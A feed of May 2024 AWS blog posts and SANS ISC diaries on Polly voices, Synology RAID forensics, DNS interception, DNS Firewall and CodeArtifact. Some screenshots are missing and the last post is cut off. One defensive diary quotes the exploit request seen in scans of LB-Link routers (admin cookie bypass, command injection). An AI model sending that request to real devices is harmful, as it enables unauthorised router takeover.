A new generative engine and three voices are now generally available on Amazon Polly

Today, we are announcing the general availability of the Amazon Polly generative engine with three voices: Ruth and Matthew in American English and Amy in British English. The new generative engine was trained on publicly available and proprietary data spanning a variety of voices, languages, and styles. It renders context-dependent prosody, pausing, spelling, dialectal properties, foreign-word pronunciation, and more with high precision.

Amazon Polly is a machine learning (ML) service that converts text into lifelike speech, a capability known as text-to-speech (TTS). Amazon Polly now offers high-quality, natural-sounding, human-like voices in dozens of languages, so you can select the ideal voice and distribute your speech-enabled applications in many locales or countries.

With Amazon Polly, you can select various voice options, including neural, long-form, and generative voices, which deliver ground-breaking improvements in speech quality and produce human-like, highly expressive, and emotionally adept voices. You can store speech output in standard formats like MP3 or OGG, adjust the speech rate, pitch, or volume with Speech Synthesis Markup Language (SSML) tags, and quickly deliver lifelike voices and conversational user experiences with consistently fast response times.
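As a quick illustration of the SSML support, here is a hedged AWS CLI sketch that slows the speaking rate with a prosody tag (the voice, rate value, and output file name are arbitrary examples; check the SSML documentation for the tags each engine supports):

$ aws polly synthesize-speech --output-format mp3 --region us-east-1 \
    --voice-id Joanna --text-type ssml \
    --text '<speak><prosody rate="90%">Welcome to Amazon Polly.</prosody></speak>' \
    welcome.mp3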

What’s the new generative engine?
Amazon Polly now supports four voice engines: standard, neural, long-form, and generative.

Standard TTS voices, introduced in 2016, use traditional concatenative synthesis. This method strings together the phonemes of recorded speech, producing very natural-sounding synthesized speech. However, the inevitable variations in recorded speech and the techniques used to segment the waveforms limit the resulting quality.

Neural TTS (NTTS) voices, introduced in 2019, use a sequence-to-sequence neural network that converts a sequence of phonemes into spectrograms, followed by a neural vocoder that converts the spectrograms into a continuous audio signal. NTTS produces even higher-quality, human-like voices than the standard engine.

Long-form voices, introduced in 2023, are developed with cutting-edge deep learning TTS technology and designed to captivate listeners’ attention for longer content, such as news articles, training materials, or marketing videos.

In February 2024, Amazon scientists introduced a new research TTS model called Big Adaptive Streamable TTS with Emergent abilities (BASE). With this technology, the Amazon Polly generative engine is able to create human-like, synthetically generated voices. You can use these voices as a knowledgeable customer assistant, a virtual trainer, or an experienced marketer.

Here are the new generative voices:

Name | Locale | Gender | Language | Sample prompt
Ruth | en_US | Female | English (US) | Selma was lying on the ground halfway down the steps. 'Selma! Selma!' we shouted in panic.
Matthew | en_US | Male | English (US) | The guards were standing outside with some of our neighbours, listening to a transistor radio. 'Any good news?' I asked. 'No, we're listening to the names of people who were killed yesterday,' Bruno replied.
Amy | en_GB | Female | English (British) | 'What are you looking at?' he said as he stood over me. They got off the bus and started searching the baggage compartment. The tension on the bus was like a dark, menacing cloud that hovered above us.

You can choose from these voice options to suit your application and use case. To learn more about the generative engine, visit Generative voices in the AWS documentation.

Get started with using generative voices
You can access the new voices using the AWS Management Console, AWS Command Line Interface (AWS CLI), or the AWS SDKs.

To get started, go to the Amazon Polly console in the US East (N. Virginia) Region and choose the Text-to-Speech menu in the left pane. If you select Ruth or Matthew under English, US, or Amy under English, UK, you can choose the Generative engine. Input your text and listen to or download the generated voice output.

Using the CLI, you can list the voices that use the new generative engine:

$ aws polly describe-voices --output json --region us-east-1 \
    | jq -r '.Voices[] | select(.SupportedEngines | index("generative")) | .Name'

Matthew
Amy
Ruth

Now, run the synthesize-speech CLI command to synthesize sample text to an audio file (hello.mp3), passing the generative engine and a supported voice ID as parameters.

$ aws polly synthesize-speech --output-format mp3 --region us-east-1 \
  --text "Hello. This is my first generative voice!" \
  --voice-id Matthew --engine generative hello.mp3

For more code examples using the AWS SDKs, visit Code and Application Examples in the AWS documentation. You will find Java and Python code examples, application examples such as web applications using Java or Python, and iOS and Android applications.

Now available
The new generative voices for Amazon Polly are available today in the US East (N. Virginia) Region. You pay only for what you use, based on the number of characters of text that you convert to speech. To learn more, visit the Amazon Polly Pricing page.

Give new generative voices a try in the Amazon Polly console today and send feedback to AWS re:Post for Amazon Polly or through your usual AWS Support contacts.

Channy

Analyzing Synology Disks on Linux, (Wed, May 8th)

Synology NAS solutions are popular devices, and they are used in many organizations. Their product range goes from small boxes with two disks (I’m not sure they still sell a single-disk enclosure today) up to rackable monsters with plenty of disks. They offer multiple disk management options but, like most appliances, rely on a lot of open-source software. For example, there are no expensive hardware RAID controllers in the box. They use the good old “MD” (“multiple devices”) technology, managed with the well-known mdadm tool[1]. Synology NAS devices run a Linux distribution called DSM. This operating system ships plenty of third-party tools but lacks pure forensics tools.

In a recent case, I had to investigate a NAS that was involved in a ransomware attack. Many files (backups) were deleted; the attacker simply deleted some shared folders. The device had two drives configured in RAID0 (not the best choice, I know, but the owner lacked storage capacity). The idea was to mount the file system (or at least expose the block device) on a Linux host and run forensic tools, for example, photorec.

In such a situation, the biggest challenge is to connect all the drives to the analysis host! Here, I had only two drives, but imagine facing a bigger model with 5+ disks. In my case, I used two USB-C/SATA adapters to connect the drives. Besides the software RAID, Synology volumes also rely on LVM2 (“Logical Volume Manager”)[2]. In most distributions, the mdadm and lvm2 packages are available (for example, on SIFT Workstation). Otherwise, just install them:

# apt install mdadm lvm2

Once you connect the disks to the analysis host (tip: label them so you can put them back in the right order), verify that they are properly detected:

# lsblk
NAME    MAJ:MIN RM   SIZE RO TYPE  MOUNTPOINTS
sda       8:0    0 465.8G  0 disk
|-sda1    8:1    0 464.8G  0 part  /
|-sda2    8:2    0     1K  0 part
`-sda5    8:5    0   975M  0 part  [SWAP]
sdb       8:16   0   3.6T  0 disk
|-sdb1    8:17   0     8G  0 part
|-sdb2    8:18   0     2G  0 part
`-sdb3    8:19   0   3.6T  0 part
sdc       8:32   0   3.6T  0 disk
|-sdc1    8:33   0   2.4G  0 part
|-sdc2    8:34   0     2G  0 part
`-sdc3    8:35   0   3.6T  0 part
sr0      11:0    1  1024M  0 rom

"sdb3" and "sdc3" are the NAS partitions used to store data (2 x 4TB in RAID0). The good news, the kernel will detect that these disks are part of a software RAID! You just need to rescan them and "re-assemble" the RAID:

# mdadm --assemble --readonly --scan --force --run 

Then, your data should be available via a /dev/md? device:

# cat /proc/mdstat
Personalities : [raid0]
md0 : active (read-only) raid0 sdb3[0] sdc3[1]
      7792588416 blocks super 1.2 64k chunks

unused devices: <none>

The next step is to detect how data are managed by the NAS. Synology provides a technology called SHR[3] that uses LVM:

# lvdisplay
  WARNING: PV /dev/md0 in VG vg1 is using an old PV header, modify the VG to update.
  --- Logical volume ---
  LV Path                /dev/vg1/syno_vg_reserved_area
  LV Name                syno_vg_reserved_area
  VG Name                vg1
  LV UUID                08g9nN-Etde-JFN9-tn3D-JPHS-pyoC-LkVZAI
  LV Write Access        read/write
  LV Creation host, time ,
  LV Status              NOT available
  LV Size                12.00 MiB
  Current LE             3
  Segments               1
  Allocation             inherit
  Read ahead sectors     auto

  --- Logical volume ---
  LV Path                /dev/vg1/volume_1
  LV Name                volume_1
  VG Name                vg1
  LV UUID                fgjC0Y-mvx5-J5Qd-Us2k-Ppaz-KG5X-tgLxaX
  LV Write Access        read/write
  LV Creation host, time ,
  LV Status              NOT available
  LV Size                <7.26 TiB
  Current LE             1902336
  Segments               1
  Allocation             inherit
  Read ahead sectors     auto

You can see that the NAS has only one volume created ("volume_1" is the default name in DSM).

From now on, you can use /dev/vg1/volume_1 in your investigations. Mount it, scan it, image it, etc…
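As a rough sketch of those last steps (assuming the volume holds an ext4 file system and you keep everything strictly read-only; adjust the mount point and tools to your case):

# vgchange -ay vg1                                     # activate the volume group
# mkdir -p /mnt/evidence
# mount -o ro,noload /dev/vg1/volume_1 /mnt/evidence   # 'noload' skips the ext4 journal replay
# photorec /dev/vg1/volume_1                           # carve deleted files straight from the block device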

[1] https://en.wikipedia.org/wiki/Mdadm
[2] https://en.wikipedia.org/wiki/Logical_Volume_Manager_(Linux)
[3] https://kb.synology.com/en-br/DSM/tutorial/What_is_Synology_Hybrid_RAID_SHR

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Detecting XFinity/Comcast DNS Spoofing, (Mon, May 6th)

ISPs have a history of intercepting DNS. Often, DNS interception is done as part of a "value add" feature to block access to known malicious websites. Sometimes, users are directed to advertisements if they attempt to access a site that doesn't exist. There are two common techniques for DNS spoofing/interception:

  1. The ISP provides a recommended DNS server. This DNS server will filter requests to known malicious sites.
  2. The ISP intercepts all DNS requests, not just requests directed at the ISP's DNS server.

The first method is what I would consider the "recommended" or "best practice" option. The customer can use the ISP's DNS server, but traffic is left untouched if a customer selects a different recursive resolver. The problem with this approach is that malware sometimes alters the user's DNS settings.

Comcast, as part of its "Business Class" offer, provides a tool called "Security Edge". It is typically included for free as part of the service. Security Edge is supposed to interface with the customer's modem but can only do so for specific configurations. Part of the service is provided by DNS interception. Even if "Security Edge" is disabled in the customer's dashboard, DNS interception may still be active.

One issue with any filtering based on blocklists is false positives. In some cases, what constitutes a "malicious" hostname may not even be well defined. I could not find a definition on Comcast's website. But Bleeping Computer (www.bleepingcomputer.com) recently ended up on Comcast's "naughty list". I know all too well how easy it is for a website that covers security topics to end up on these lists. The Internet Storm Center website has been on lists like this before. Usually, sloppy signature-based checks flag a site as malicious: an article may discuss a specific attack and quote strings that trigger these signatures.

Comcast offers recursive resolvers to its customers: 75.75.75.75, 75.75.76.76, 2001:558:feed::1, and 2001:558:feed::2. There are advantages to using your ISP's DNS servers. They are often faster because they are physically closer to your network, and you profit from responses cached by other users. My internal resolver is configured as a forwarding resolver, spreading queries among different well-performing resolvers like Quad9, Cloudflare, and Google.
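For reference, such a forwarding setup is only a few lines in BIND's options block (a minimal sketch; adapt it to your own resolver software):

options {
    forwarders { 9.9.9.9; 1.1.1.1; 8.8.8.8; };  // Quad9, Cloudflare, Google
    forward first;
    dnssec-validation auto;
};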

So what happened to bleepingcomputer.com? When I wasn't able to resolve bleepingcomputer.com, I checked my DNS logs, and this entry stuck out:

broken trust chain resolving 'bleepingcomputer.com/A/IN': 8.8.8.8#53 

My resolver verifies DNSSEC. Suddenly, I could not verify DNSSEC, which is a good indication that either DNSSEC was misconfigured or someone was modifying DNS responses. Note that the response appeared to come from Google's name server (8.8.8.8).

My first step in debugging this problem was dnsviz.net, a website operated by Sandia National Laboratories. The site does a good job of visualizing DNSSEC and identifying configuration issues. bleepingcomputer.com looked fine; it doesn't use DNSSEC at all. So why the error? There was another error in my resolver's logs that shed some light on the issue:

no valid RRSIG resolving 'bleepingcomputer.com/DS/IN': 8.8.8.8#53

DNSSEC has to establish somehow whether a particular zone supports DNSSEC or not. The parent zone offers "NSEC3" records to prove whether a child zone is signed or not, and DS records, also served by the parent zone, verify the keys you receive for a signed zone. If DNS is intercepted, the requests for these records may fail, indicating that something odd is happening.
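You can check for these records yourself with dig (a quick sketch; any resolver will do):

% dig +dnssec DS bleepingcomputer.com @8.8.8.8

For an unsigned zone like bleepingcomputer.com, the answer should contain no DS record, but the authority section should carry signed NSEC3 records from the .com zone proving that none exists. If interception strips or mangles that proof, a validating resolver logs errors like the ones above.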

So, someone was "playing" with DNS. And it affected various DNS servers I tried, not just Comcast or Google. Using "dig" to query the name servers directly, and skipping DNSSEC, I received a response:

8.8.8.8.53 > 10.64.10.10.4376: 35148 2/0/1 www.bleepingcomputer.com. A 192.73.243.24, www.bleepingcomputer.com. A 192.73.243.36 (85)

Usually, www.bleepingcomputer.com resolved to:

% dig +short www.bleepingcomputer.com
104.20.185.56
172.67.2.229
104.20.184.56

It took a bit of convincing, but I was able to pull up the web page at the wrong IP address:

screen shot of Comcast block page.

The problem with these warning pages is that you usually never see them. Even if you resolve the IP address, TLS will break the connection, and many sites employ strict transport security. As part of my Comcast business account, I can "brand" the page, but by default, it is hard to tell that this page was delivered by Comcast.

But how do we know if someone is interfering with DNS traffic? Two simple checks I employ are to look at DNS response timing and to compare TTL values across different name servers.

(1) Check timing

Send the same query to multiple public recursive DNS servers. For example:

% dig www.bleepingcomputer.com @75.75.75.75

; <<>> DiG 9.10.6 <<>> www.bleepingcomputer.com @75.75.75.75
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8432
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;www.bleepingcomputer.com.    IN    A

;; ANSWER SECTION:
www.bleepingcomputer.com. 89    IN    A    104.20.185.56
www.bleepingcomputer.com. 89    IN    A    104.20.184.56
www.bleepingcomputer.com. 89    IN    A    172.67.2.229

;; Query time: 59 msec
;; SERVER: 75.75.75.75#53(75.75.75.75)
;; WHEN: Tue May 07 20:00:05 EDT 2024
;; MSG SIZE  rcvd: 101

Dig includes the "Query time" in its output. In this case, it was 59 msec. We expect a speedy time like this for Comcast's DNS server while connected to Comcast's network. But let's compare this to other servers:

8.8.8.8: 59 msec
1.1.1.1: 59 msec
9.9.9.9: 64 msec
11.11.11.11: 68 msec
113.113.113.113: 69 msec

The results are very consistent. The last one is particularly interesting: that server is located in China, and a genuine round trip there should take considerably longer than 69 msec. Responses this fast and this uniform suggest the queries never actually left Comcast's network.
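A small shell loop makes it easy to collect these numbers (a sketch; substitute whatever resolvers you like):

% for ns in 75.75.75.75 8.8.8.8 1.1.1.1 9.9.9.9 113.113.113.113; do
    printf "%s: " $ns
    dig +tries=1 +time=5 www.bleepingcomputer.com @$ns | grep "Query time"
  done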

(2) Check TTLs

A recursive resolver adds responses it receives from authoritative DNS servers to its cache. The TTL of records pulled from the cache decreases with the time the response sits in the resolver's cache. If all responses come from the same resolver, the TTL should decrement consistently. This test is a bit less telling: often, several servers sit behind one address, and with anycast, it is not always easy to tell which server a response comes from. These servers do not always have a consistent cache.
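A hedged example of the check: query the same resolver twice, a little while apart, and watch the TTL (the second column of the answer) count down. A TTL that never decreases, or that jumps around inconsistently for the same resolver, can indicate that answers are synthesized in-path rather than served from a real cache.

% dig +noall +answer www.bleepingcomputer.com @75.75.75.75
% sleep 30
% dig +noall +answer www.bleepingcomputer.com @75.75.75.75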

Final Words

DNS interception, even if well-meaning, undermines some of the basic trust in the internet. Even if it is used to block users from malicious sites, it needs to be properly declared to the user, and switches to turn it off have to actually work. This could be a particular problem if queries to other DNS filtering services are intercepted. I have yet to test this for Comcast and, for example, OpenDNS.

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AWS Weekly Roundup: Amazon Q, Amazon QuickSight, AWS CodeArtifact, Amazon Bedrock, and more (May 6, 2024)

April was packed with new releases! Last week continued that trend with many new releases supporting a variety of domains such as security, analytics, and DevOps, as well as more exciting new capabilities within generative AI.

If you missed the AWS Summit London 2024, you can now watch the sessions on demand, including the keynote by Tanuja Randery, VP & Managing Director, EMEA, and many of the breakout sessions, which will continue to be released over the coming weeks.

Last week’s launches
Here are some of the highlights that caught my attention this week:

Manual and automatic rollback from any stage in AWS CodePipeline – You can now roll back any stage, other than Source, to any previously known good state if you use a V2 pipeline in AWS CodePipeline. You can configure automatic rollback, which uses the source changes from the most recent successful pipeline execution in the case of failure, or you can initiate a manual rollback for any stage from the console, API, or SDK and choose which pipeline execution you want to use for the rollback.

AWS CodeArtifact now supports RubyGems – Ruby community, rejoice: you can now store your gems in AWS CodeArtifact! You can integrate it with RubyGems.org, and CodeArtifact will automatically fetch any gems requested by the client and store them locally in your CodeArtifact repository. That means you can have a centralized place for both your first-party and public gems, so developers can access their dependencies from a single source.

Ruby-repo screenshot

Create a repository in AWS CodeArtifact and choose “rubygems-store” from the “Public upstream repositories” dropdown to connect your repository to RubyGems.org.

Amazon EventBridge Pipes now supports event delivery through AWS PrivateLink – You can now deliver events to an Amazon EventBridge Pipes target without traversing the public internet by using AWS PrivateLink. You can poll for events in a private subnet in your Amazon Virtual Private Cloud (VPC) without having to deploy any additional infrastructure to keep your traffic private.

Amazon Bedrock launches continue. You can now run scalable, enterprise-grade generative AI workloads with Cohere Command R & R+. And Amazon Titan Text V2 is now optimized for improving Retrieval-Augmented Generation (RAG).

AWS Trusted Advisor – Last year, we launched Trusted Advisor APIs, enabling you to programmatically consume recommendations. A new API is now available that you can use to exclude resources from recommendations.

Amazon EC2 – There have been two great new launches for EC2 users this week. You can now mark your AMIs as “protected” to avoid them being deregistered by accident. You can also now easily discover your active AMIs by simply describing them.

Amazon CodeCatalyst – You can now view your Git commit history in the CodeCatalyst console.

General Availability
Many new services and capabilities became generally available this week.

Amazon Q in QuickSight – Amazon Q has brought generative BI to Amazon QuickSight, giving you the ability to build beautiful dashboards automatically simply by using natural language, and it’s now generally available. To get started, head to the QuickSight Pricing page to explore all options or start a 30-day free trial, which allows up to 4 users per QuickSight account to use all the new generative AI features.

With the new generative AI features enabled by Amazon Q in Amazon QuickSight you can use natural language queries to build, sort and filter dashboards. (source: AWS Documentation)

Amazon Q Business (GA) and Amazon Q Apps (Preview) – Also generally available now is Amazon Q Business, which we launched last year at AWS re:Invent 2023, with the ability to connect seamlessly with over 40 popular enterprise systems, including Microsoft 365, Salesforce, Amazon Simple Storage Service (Amazon S3), Gmail, and many more. This allows Amazon Q Business to know about your business so your employees can generate content, solve problems, and take actions that are specific to your business.

We have also launched support for custom plug-ins, so now you can create your own integrations with any third-party application.

Q-business screenshot

With general availability of Amazon Q Business we have also launched the ability to create your own custom plugins to connect to any third-party API.

Another highlight of this release is the launch of Amazon Q Apps, which enables you to quickly generate an app from your conversation with Amazon Q Business, or by describing what you would like it to generate for you. All guardrails from Amazon Q Business apply, and it’s easy to share your apps with colleagues through an admin-managed library. Amazon Q Apps is in preview now.

Check out Channy Yun’s post for a deeper dive into Amazon Q Business and Amazon Q Apps, which guides you through these new features.

Amazon Q Developer – you can use Q Developer to completely change your developer flow. It has all the capabilities of what was previously known as Amazon CodeWhisperer, such as Q&A, diagnosing common errors, generating code including tests, and many more. Now it has expanded, so you can use it to generate SQL, and build data integration pipelines using natural language. In preview, it can describe resources in your AWS account and help you retrieve and analyze cost data from AWS Cost Explorer.

For a full list of AWS announcements, be sure to keep an eye on the ‘What’s New with AWS?‘ page.

Other AWS news
Here are some additional projects, blog posts, and news items that you might find interesting:

AWS open source news and updates – My colleague Ricardo writes about open source projects, tools, and events from the AWS Community.

Discover Claude 3 – If you’re a developer looking for a good resource to get started with Claude 3, then I recommend this great post from my colleague Haowen Huang: Mastering Amazon Bedrock with Claude 3: Developer’s Guide with Demos.

Upcoming AWS events
Check your calendars and sign up for upcoming AWS events:

AWS Summits – Join free online and in-person events that bring the cloud computing community together to connect, collaborate, and learn about AWS. Register in your nearest city: Singapore (May 7), Seoul (May 16–17), Hong Kong (May 22), Milan (May 23), Stockholm (June 4), and Madrid (June 5).

AWS re:Inforce – Explore 2.5 days of immersive cloud security learning in the age of generative AI at AWS re:Inforce, June 10–12 in Pennsylvania.

AWS Community Days – Join community-led conferences that feature technical discussions, workshops, and hands-on labs led by expert AWS users and industry leaders from around the world: Turkey (May 18), Midwest | Columbus (June 13), Sri Lanka (June 27), Cameroon (July 13), Nigeria (August 24), and New York (August 28).

GOTO EDA Day London – Join us in London on May 14 to learn about event-driven architectures (EDA) for building highly scalable, fault-tolerant, and extensible applications. This conference is organized by GOTO, AWS, and partners.

Browse all upcoming AWS-led in-person and virtual events and developer-focused events.

That’s all for this week. Check back next Monday for another Weekly Roundup!

Matheus Guimaraes

This post is part of our Weekly Roundup series. Check back each week for a quick roundup of interesting news and announcements from AWS!

nslookup's Debug Options, (Sun, May 5th)

A friend was having unexpected results with DNS queries on a Windows machine. I told him to use nslookup's debug options.

When you execute a simple DNS query like "nslookup example.com. 8.8.8.8", you get an answer like this (notice that in my nslookup query, I terminated the FQDN with a dot: "example.com."; I do that to prevent Windows from adding suffixes):

You see the result of a reverse DNS lookup (8.8.8.8 is dns.google) and you get 2 IP addresses for example.com in your answer: an IPv6 address and an IPv4 address.

If my friend had been able to run a packet capture on the machine, he would have seen 3 DNS queries and answers:

A PTR query to do a reverse DNS lookup for 8.8.8.8, an A query to look up IPv4 addresses for example.com, and an AAAA query to look up IPv6 addresses for example.com.

One can use nslookup's debug options to obtain equivalent information, without doing a packet capture.

Debug option -d displays extra information for each DNS response packet:
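The invocation is the same query as before, just with -d added (again pinning the query to 8.8.8.8 and terminating the FQDN with a dot):

nslookup -d example.com. 8.8.8.8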

Here is nslookup's parsed DNS response packet for the PTR query:

Here is Wireshark's dissection of this packet:

You can see that the debug output contains the same packet information as Wireshark's, but presented in another form.

The same applies for the A query:

And the AAAA query:

If you also want to see the DNS query packets, you can use debug option -d2:
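For example (the same query again, now with -d2):

nslookup -d2 example.com. 8.8.8.8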

Besides the parsed DNS query, you now also see the length in bytes of each DNS packet (the UDP payload).

Here is the A query:

And here is the AAAA query:

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Scans Probing for LB-Link and Vinga WR-AC1200 routers CVE-2023-24796, (Thu, May 2nd)

Before diving into the vulnerability, a bit about the affected devices. LB-Link, the maker of the devices affected by this vulnerability, produces various wireless equipment that is sometimes sold under different brands and labels. This makes it difficult to identify affected devices. These devices are often low-cost "no name" solutions or, in some cases, may even be embedded, which makes it even more difficult to find firmware updates.

Before buying any IoT device, WiFi router, or similar piece of equipment, please make sure the vendor does:

  1. Offer firmware updates for download from an easy-to-find location.
  2. Provide an "end of life" policy stating how long a particular device will receive updates.

Alternatively, you may want to verify if the device can be "re-flashed" using an open source firmware.

But let us go back to this vulnerability. There are two URLs affected, one of which showed up in our "First Seen URLs":

/goform/sysTools
/goform/set_LimitClient_cfg

The second one has been used more in the past; the first is relatively new in our logs. The graph below shows how "set_LimitClient_cfg" is much more popular. We only saw a significant number of scans for "sysTools" on May 1st.

The full requests we are seeing:

POST /goform/set_LimitClient_cfg HTTP/1.1
Cookie: user=admin

And yes, the vulnerability revolves around the "user=admin" cookie and a command injection in the password parameter. This is too trivial to waste any more time on, but it is common enough to just give up and call it a day. The NVD entry for the vulnerability was updated last week, adding an older PoC exploit to it. Maybe that got some kids interested in this vulnerability again.


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Stop the CNAME chain struggle: Simplified management with Route 53 Resolver DNS Firewall

Starting today, you can configure your DNS Firewall to automatically trust all domains in a resolution chain (such as a CNAME, DNAME, or Alias chain).

Let’s walk through this in nontechnical terms for those unfamiliar with DNS.

Why use DNS Firewall?
DNS Firewall provides protection for outbound DNS requests from your private network in the cloud (Amazon Virtual Private Cloud (Amazon VPC)). These requests route through Amazon Route 53 Resolver for domain name resolution. Firewall administrators can configure rules to filter and regulate the outbound DNS traffic.

DNS Firewall helps to protect against multiple security risks.

Let’s imagine a malicious actor managed to install and run some code on your Amazon Elastic Compute Cloud (Amazon EC2) instances or containers running inside one of your virtual private clouds (VPCs). The malicious code is likely to initiate outgoing network connections. It might do so to connect to a command server and receive commands to execute on your machine. Or it might initiate connections to a third-party service in a coordinated distributed denial of service (DDoS) attack. It might also try to exfiltrate data it managed to collect on your network.

Fortunately, your network and security groups are correctly configured. They block all outgoing traffic except the one to well-known API endpoints used by your app. So far so good—the malicious code cannot dial back home using regular TCP or UDP connections.

But what about DNS traffic? The malicious code may send DNS requests to an authoritative DNS server they control to either send control commands or encoded data, and it can receive data back in the response. I’ve illustrated the process in the following diagram.

DNS exfiltration illustrated

To prevent these scenarios, you can use a DNS Firewall to monitor and control the domains that your applications can query. You can deny access to the domains that you know to be bad and allow all other queries to pass through. Alternatively, you can deny access to all domains except those you explicitly trust.

What is the challenge with CNAME, DNAME, and Alias records?
Imagine you configured your DNS Firewall to allow DNS queries only to specific well-known domains and blocked all others. Your application communicates with alexa.amazon.com; therefore, you created a rule allowing DNS traffic to resolve that hostname.

However, the DNS system has multiple types of records. The ones of interest in this article are

  • A records that map a DNS name to an IP address,
  • CNAME records that are synonyms for other DNS names,
  • DNAME records that provide redirection from a part of the DNS name tree to another part of the DNS name tree, and
  • Alias records that provide a Route 53-specific extension to DNS functionality. Alias records let you route traffic to selected AWS resources, such as Amazon CloudFront distributions and Amazon S3 buckets.

When querying alexa.amazon.com, I see it’s actually a CNAME record that points to pitangui.amazon.com, which is another CNAME record that points to tp.5fd53c725-frontier.amazon.com, which, in turn, is a CNAME to d1wg1w6p5q8555.cloudfront.net. Only the last name (d1wg1w6p5q8555.cloudfront.net) has an A record associated with an IP address 3.162.42.28. The IP address is likely to be different for you. It points to the closest Amazon CloudFront edge location, likely the one from Paris (CDG52) for me.

A similar redirection mechanism happens when resolving DNAME or Alias records.

DNS resolution for alexa.amazon.com

To allow the complete resolution of such a CNAME chain, you could be tempted to configure your DNS Firewall rule to allow all names under amazon.com (*.amazon.com), but that would fail to resolve the last CNAME that goes to cloudfront.net.

Worse, the DNS CNAME chain is controlled by the service your application connects to. The chain might change at any time, forcing you to manually maintain the list of rules and authorized domains inside your DNS Firewall rules.

Introducing DNS Firewall redirection chain authorization
Based on this explanation, you’re now equipped to understand the new capability we launch today. We added a parameter to the UpdateFirewallRule API (also available on the AWS Command Line Interface (AWS CLI) and AWS Management Console) to configure the DNS Firewall so that it follows and automatically trusts all the domains in a CNAME, DNAME, or Alias chain.

With this parameter, firewall administrators only need to allow the domains their applications actually query. The firewall automatically trusts all intermediate domains in the chain until it reaches the A record with the IP address.

Let’s see it in action
I start with a DNS Firewall already configured with a domain list, a rule group, and a rule with the ALLOW action for the domain alexa.amazon.com. The rule group is attached to a VPC where I have an EC2 instance started.

When I connect to that EC2 instance and issue a DNS query to resolve alexa.amazon.com, it only returns the first name in the domain chain (pitangui.amazon.com) and stops there. This is expected because pitangui.amazon.com is not authorized to be resolved.

DNS query for alexa.amazon.com is blocked at first CNAME

To solve this, I update the firewall rule to trust the entire redirection chain. I use the AWS CLI to call the update-firewall-rule API with a new parameter firewall-domain-redirection-action set to TRUST_REDIRECTION_DOMAIN.

AWS CLI to update the DNS firewall rule
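A hedged sketch of that CLI call (the rule group and domain list IDs below are placeholders; together they identify the rule to update):

$ aws route53resolver update-firewall-rule \
    --firewall-rule-group-id rslvr-frg-0123456789abcdef \
    --firewall-domain-list-id rslvr-fdl-0123456789abcdef \
    --firewall-domain-redirection-action TRUST_REDIRECTION_DOMAIN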

The following diagram illustrates the setup at this stage.

DNS Firewall rule diagram

Back to the EC2 instance, I try the DNS query again. This time, it works. It resolves the entire redirection chain, down to the IP address.

DNS resolution for the full CNAME chain

Thanks to the trusted chain redirection, network administrators now have an easy way to implement a strategy to block all domains and authorize only known domains in their DNS Firewall without having to care about CNAME, DNAME, or Alias chains.

This capability is available at no additional cost in all AWS Regions. Try it out today!

— seb

Linux Trojan – Xorddos with Filename eyshcjdmzg, (Mon, Apr 29th)

I reviewed a filename, eyshcjdmzg, that I have seen regularly uploaded to my DShield sensor since 1 October 2023. It has multiple hashes and has been labeled as trojan.xorddos/ddos. These various files have only been uploaded to my DShield sensor by IP 218.92.0.60. Here is the timeline of the activity since 1 October 2023.

Add your Ruby gems to AWS CodeArtifact

Ruby developers can now use AWS CodeArtifact to securely store and retrieve their gems. CodeArtifact integrates with standard developer tools like gem and bundler.

Applications often use numerous packages to speed up development by providing reusable code for common tasks like network access, cryptography, or data manipulation. Developers also embed SDKs, such as the AWS SDKs, to access remote services. These packages may come from within your organization or from third parties like open source projects. Managing packages and dependencies is integral to software development. Languages like Java, C#, JavaScript, Swift, and Python have tools for downloading and resolving dependencies, and Ruby developers typically use gem and bundler.

However, using third-party packages presents legal and security challenges. Organizations must ensure package licenses are compatible with their projects and don’t violate intellectual property. They must also verify that the included code is safe and doesn’t introduce vulnerabilities or malicious code slipped into a package, a tactic known as a supply chain attack. To address these challenges, organizations typically use private package servers. Developers can only use packages vetted by security and legal teams made available through private repositories.

CodeArtifact is a managed service that allows the safe distribution of packages to internal developer teams without managing the underlying infrastructure. CodeArtifact now supports Ruby gems in addition to npm, PyPI, Maven, NuGet, SwiftPM, and generic formats.

You can publish and download Ruby gem dependencies from your CodeArtifact repository in the AWS Cloud, working with existing tools such as gem and bundler. After storing packages in CodeArtifact, you can reference them in your Gemfile. Your build system will then download approved packages from the CodeArtifact repository during the build process.

How to get started
Imagine I’m working on a package to be shared with other development teams in my organization.

In this demo, I show you how I prepare my environment, upload the package to the repository, and use this specific package build as a dependency for my project. I focus on the steps specific to Ruby packages. You can read the tutorial written by my colleague Steven to get started with CodeArtifact.

I use an AWS account that has a package repository (MyGemsRepo) and domain (stormacq-test) already configured.

CodeArtifact - Ruby repository

To let the Ruby tools access my CodeArtifact repository, I start by collecting an authentication token from CodeArtifact.

export CODEARTIFACT_AUTH_TOKEN=`aws codeartifact get-authorization-token \
                                     --domain stormacq-test              \
                                     --domain-owner 012345678912         \
                                     --query authorizationToken          \
                                     --output text`

export GEM_HOST_API_KEY="Bearer $CODEARTIFACT_AUTH_TOKEN"

Note that the authentication token expires after 12 hours. I must repeat this command after 12 hours to obtain a fresh token.

Then, I request the repository endpoint. I pass the domain name and domain owner (the AWS account ID). Notice the --format ruby option.

export RUBYGEMS_HOST=`aws codeartifact get-repository-endpoint \
                           --domain stormacq-test              \
                           --domain-owner 012345678912         \
                           --format ruby                       \
                           --repository MyGemsRepo             \
                           --query repositoryEndpoint          \
                           --output text`

Now that I have the repository endpoint and an authentication token, gem will use these environment variable values to connect to my private package repository.

I create a very simple project, build it, and send it to the package repository.

CodeArtifact - building and pushing a custom package

$ gem build hola.gemspec 

Successfully built RubyGem
  Name: hola-codeartifact
  Version: 0.0.0
  File: hola-codeartifact-0.0.0.gem
  
